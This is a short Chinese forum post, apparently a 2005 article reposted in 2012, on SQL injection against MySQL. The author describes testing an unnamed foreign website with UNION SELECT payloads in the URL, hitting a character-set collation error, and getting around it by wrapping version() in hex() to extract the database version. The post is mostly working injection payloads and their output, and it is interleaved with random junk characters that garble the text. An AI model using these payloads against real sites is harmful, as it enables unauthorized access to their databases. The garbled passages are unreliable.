本文作者:SuperHei
9 ~% q+ n/ G+ @6 \. {( _7 \文章性质:原创% G, M& \3 L; c- @ h) F
发布日期:2005-10-18# E7 }# y7 Y5 U/ \' D% R6 Z3 \* i
测试个国外的站时:
8 [% Y9 `7 `/ z! m% n3 uurl:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*6 A! K" u8 s# E6 ^1 \+ X- ~
返回错误:
5 I2 p! O6 K9 U& XIllegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
! ~ x0 e2 M! _/ _! ^" J1 q0 dMySQL Error No. 1262 Q( e) g' h0 R& _0 L3 q: T1 n
看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。
; k) x R+ P9 l$ r. v( [6 B解决办法:转为其他编码如hex。5 O1 c _3 \2 C. t3 y& `9 i
url:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/* ]; k% K! P" t# Y( J) x
成功得到hex(version())的值为:. x6 l. y" O( R `/ s x# u* m
342E312E332D62657461
8 ?# C2 R) z1 ^3 ^7 y回Mysql查询下得到:
6 P- b# Z$ i/ o5 o- ^/ m4 q& jmysql> select 0x342E312E332D62657461;
* l M A& R; Z2 c. N+------------------------+7 o" d* J# b" N5 s2 V
| 0x342E312E332D62657461 |; Y/ U P7 _; M f7 X% w3 ?4 P: @) ]
+------------------------+ ?, f0 [4 o* [ R' h
| 4.1.3-beta |% U m! L8 J% d& e. z" P$ U
+------------------------+) f4 {9 |' I/ ]6 O) D( x
1 row in set (0.00 sec)
+ M0 i7 r7 o$ A3 v# F/ x% ]8 r1 X* W1 s
|
发表于 2012-9-15 14:04:54
收藏
支持
反对